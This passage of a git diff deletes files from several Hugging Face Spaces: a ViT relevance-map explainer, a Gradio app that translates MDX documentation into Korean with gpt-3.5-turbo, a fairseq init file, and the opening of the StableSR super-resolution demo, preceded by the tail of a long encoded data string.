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", -} diff --git a/spaces/Hila/RobustViT/ViT/explainer.py b/spaces/Hila/RobustViT/ViT/explainer.py deleted file mode 100644 index 7c5b98aeb13ae63e88aae67d9216fd69d6390145..0000000000000000000000000000000000000000 --- a/spaces/Hila/RobustViT/ViT/explainer.py +++ /dev/null @@ -1,71 +0,0 @@ -import torch -import numpy as np -import cv2 - -# rule 5 from paper -def avg_heads(cam, grad): - cam = cam.reshape(-1, cam.shape[-3], cam.shape[-2], cam.shape[-1]) - grad = grad.reshape(-1, cam.shape[-3], grad.shape[-2], grad.shape[-1]) - cam = grad * cam - cam = cam.clamp(min=0).mean(dim=1) - return cam - -# rule 6 from paper -def apply_self_attention_rules(R_ss, cam_ss): - R_ss_addition = torch.matmul(cam_ss, R_ss) - return R_ss_addition - -def upscale_relevance(relevance): - relevance = relevance.reshape(-1, 1, 14, 14) - relevance = torch.nn.functional.interpolate(relevance, scale_factor=16, mode='bilinear') - - # normalize between 0 and 1 - relevance = relevance.reshape(relevance.shape[0], -1) - min = relevance.min(1, keepdim=True)[0] - max = relevance.max(1, keepdim=True)[0] - relevance = (relevance - min) / (max - min) - - relevance = relevance.reshape(-1, 1, 224, 224) - return relevance - -def generate_relevance(model, input, index=None): - # a batch of samples - batch_size = input.shape[0] - output = model(input, register_hook=True) - if index == None: - index = np.argmax(output.cpu().data.numpy(), axis=-1) - index = torch.tensor(index) - - one_hot = np.zeros((batch_size, output.shape[-1]), dtype=np.float32) - one_hot[torch.arange(batch_size), index.data.cpu().numpy()] = 1 - one_hot = torch.from_numpy(one_hot).requires_grad_(True) - one_hot = torch.sum(one_hot.to(input.device) * output) - model.zero_grad() - - num_tokens = model.blocks[0].attn.get_attention_map().shape[-1] - R = torch.eye(num_tokens, num_tokens).cuda() - R = R.unsqueeze(0).expand(batch_size, num_tokens, num_tokens) - for i, blk in enumerate(model.blocks): - grad = torch.autograd.grad(one_hot, [blk.attn.attention_map], retain_graph=True)[0] - cam = blk.attn.get_attention_map() - cam = avg_heads(cam, grad) - R = R + apply_self_attention_rules(R, cam) - relevance = R[:, 0, 1:] - return upscale_relevance(relevance) - -# create heatmap from mask on image -def show_cam_on_image(img, mask): - heatmap = cv2.applyColorMap(np.uint8(255 * mask), cv2.COLORMAP_JET) - heatmap = np.float32(heatmap) / 255 - cam = heatmap + np.float32(img) - cam = cam / np.max(cam) - return cam - - -def get_image_with_relevance(image, relevance): - image = image.permute(1, 2, 0) - relevance = relevance.permute(1, 2, 0) - image = (image - image.min()) / (image.max() - image.min()) - image = 255 * image - vis = image * relevance - return vis.data.cpu().numpy() \ No newline at end of file diff --git a/spaces/Hina4867/bingo/src/components/toaster.tsx b/spaces/Hina4867/bingo/src/components/toaster.tsx deleted file mode 100644 index 4d2693460b61307a1d4c127fd01df9bee16e59ff..0000000000000000000000000000000000000000 --- a/spaces/Hina4867/bingo/src/components/toaster.tsx +++ /dev/null @@ -1,3 +0,0 @@ -'use client' - -export { Toaster } from 'react-hot-toast' diff --git a/spaces/Hyeonseo/ChatGPT-ko-translation-prompt/app.py b/spaces/Hyeonseo/ChatGPT-ko-translation-prompt/app.py deleted file mode 100644 index 149a8cac02b0be3787a6b89a3419927ef1288bf8..0000000000000000000000000000000000000000 --- a/spaces/Hyeonseo/ChatGPT-ko-translation-prompt/app.py +++ /dev/null @@ -1,76 +0,0 @@ -import gradio as gr -import subprocess -import openai -import time -import re - -def translate(text_input, openapi_key): - openai.api_key = openapi_key - - # 라이선스 문장 제거 - rm_line = text_input.find('-->') - text_list = text_input[rm_line+4:].split('\n') - print(text_list) - - reply = [] - - for i in range(0,len(text_list),10): - content = """What do these sentences about Hugging Face Transformers (a machine learning library) mean in Korean? Please do not translate the word after a 🤗 emoji as it is a product name. Please ignore the video and image and translate only the sentences I provided. Ignore the contents of the iframe tag. - ```md - %s"""%'\n'.join(text_list[i:i+10]) - - chat = openai.ChatCompletion.create( - model = "gpt-3.5-turbo-0301", messages=[ - {"role": "system", - "content": content},]) - - print("질문") - print(content) - print("응답") - print(chat.choices[0].message.content) - - reply.append(chat.choices[0].message.content) - - time.sleep(30) - - return ''.join(reply) - -inputs = [ - gr.inputs.Textbox(lines=2, label="Input Open API Key"), - gr.inputs.File(label="Upload MDX File") -] - -outputs = gr.outputs.Textbox(label="Translation") - -def translate_with_upload(text, file): - - openapi_key = text - - if file is not None: - text_input = "" - with open(file.name, 'r') as f: - text_input += f.read() - text_input += '\n' - print(text_input) - # 텍스트에서 코드 블록을 제거합니다. - text_input = re.sub(r'```.*?```', '', text_input, flags=re.DOTALL) - - text_input = re.sub(r'^\|.*\|$\n?', '', text_input, flags=re.MULTILINE) - - # 텍스트에서 빈 줄을 제거합니다. - text_input = re.sub(r'^\n', '', text_input, flags=re.MULTILINE) - text_input = re.sub(r'\n\n+', '\n\n', text_input) - else: - text_input = "" - - return translate(text_input, openapi_key) - -prompt_translate = gr.Interface( - fn=translate_with_upload, - inputs=inputs, - outputs=outputs, - title="ChatGPT Korean Prompt Translation", - description="Translate your text into Korean using the GPT-3 model.", verbose=True -) - -prompt_translate.launch() diff --git a/spaces/ICML2022/OFA/fairseq/examples/wav2vec/unsupervised/tasks/__init__.py b/spaces/ICML2022/OFA/fairseq/examples/wav2vec/unsupervised/tasks/__init__.py deleted file mode 100644 index 6d7dd625e09451be671908578f93148f371f53cd..0000000000000000000000000000000000000000 --- a/spaces/ICML2022/OFA/fairseq/examples/wav2vec/unsupervised/tasks/__init__.py +++ /dev/null @@ -1,11 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from .unpaired_audio_text import UnpairedAudioText - - -__all__ = [ - "UnpairedAudioText", -] diff --git a/spaces/Iceclear/StableSR/app.py b/spaces/Iceclear/StableSR/app.py deleted file mode 100644 index 9bd68c4c6603413c41e3187e9de6ea6cd8a8633a..0000000000000000000000000000000000000000 --- a/spaces/Iceclear/StableSR/app.py +++ /dev/null @@ -1,363 +0,0 @@ -""" -This file is used for deploying hugging face demo: -https://huggingface.co/spaces/ -""" - -import sys -sys.path.append('StableSR') -import os -import cv2 -import torch -import torch.nn.functional as F -import gradio as gr -import torchvision -from torchvision.transforms.functional import normalize -from ldm.util import instantiate_from_config -from torch import autocast -import PIL -import numpy as np -from pytorch_lightning import seed_everything -from contextlib import nullcontext -from omegaconf import OmegaConf -from PIL import Image -import copy -from scripts.wavelet_color_fix import wavelet_reconstruction, adaptive_instance_normalization -from scripts.util_image import ImageSpliterTh -from basicsr.utils.download_util import load_file_from_url -from einops import rearrange, repeat - -# os.system("pip freeze") - -pretrain_model_url = { - 'stablesr_512': 'https://huggingface.co/Iceclear/StableSR/resolve/main/stablesr_000117.ckpt', - 'stablesr_768': 'https://huggingface.co/Iceclear/StableSR/resolve/main/stablesr_768v_000139.ckpt', - 'CFW': 'https://huggingface.co/Iceclear/StableSR/resolve/main/vqgan_cfw_00011.ckpt', -} -# download weights -if not os.path.exists('./stablesr_000117.ckpt'): - load_file_from_url(url=pretrain_model_url['stablesr_512'], model_dir='./', progress=True, file_name=None) -if not os.path.exists('./stablesr_768v_000139.ckpt'): - load_file_from_url(url=pretrain_model_url['stablesr_768'], model_dir='./', progress=True, file_name=None) -if not os.path.exists('./vqgan_cfw_00011.ckpt'): - load_file_from_url(url=pretrain_model_url['CFW'], model_dir='./', progress=True, file_name=None) - -# download images -torch.hub.download_url_to_file( - 'https://raw.githubusercontent.com/zsyOAOA/ResShift/master/testdata/RealSet128/Lincoln.png', - '01.png') -torch.hub.download_url_to_file( - 'https://raw.githubusercontent.com/zsyOAOA/ResShift/master/testdata/RealSet128/oldphoto6.png', - '02.png') -torch.hub.download_url_to_file( - 'https://raw.githubusercontent.com/zsyOAOA/ResShift/master/testdata/RealSet128/comic2.png', - '03.png') -torch.hub.download_url_to_file( - 'https://raw.githubusercontent.com/zsyOAOA/ResShift/master/testdata/RealSet128/OST_120.png', - '04.png') -torch.hub.download_url_to_file( - 'https://raw.githubusercontent.com/zsyOAOA/ResShift/master/testdata/RealSet65/comic3.png', - '05.png') - -def load_img(path): - image = Image.open(path).convert("RGB") - w, h = image.size - w, h = map(lambda x: x - x % 32, (w, h)) # resize to integer multiple of 32 - image = image.resize((w, h), resample=PIL.Image.LANCZOS) - image = np.array(image).astype(np.float32) / 255.0 - image = image[None].transpose(0, 3, 1, 2) - image = torch.from_numpy(image) - return 2.*image - 1. - -def space_timesteps(num_timesteps, section_counts): - """ - Create a list of timesteps to use from an original diffusion process, - given the number of timesteps we want to take from equally-sized portions - of the original process. - For example, if there's 300 timesteps and the section counts are [10,15,20] - then the first 100 timesteps are strided to be 10 timesteps, the second 100 - are strided to be 15 timesteps, and the final 100 are strided to be 20. - If the stride is a string starting with "ddim", then the fixed striding - from the DDIM paper is used, and only one section is allowed. - :param num_timesteps: the number of diffusion steps in the original - process to divide up. - :param section_counts: either a list of numbers, or a string containing - comma-separated numbers, indicating the step count - per section. As a special case, use "ddimN" where N - is a number of steps to use the striding from the - DDIM paper. - :return: a set of diffusion steps from the original process to use. - """ - if isinstance(section_counts, str): - if section_counts.startswith("ddim"): - desired_count = int(section_counts[len("ddim"):]) - for i in range(1, num_timesteps): - if len(range(0, num_timesteps, i)) == desired_count: - return set(range(0, num_timesteps, i)) - raise ValueError( - f"cannot create exactly {num_timesteps} steps with an integer stride" - ) - section_counts = [int(x) for x in section_counts.split(",")] #[250,] - size_per = num_timesteps // len(section_counts) - extra = 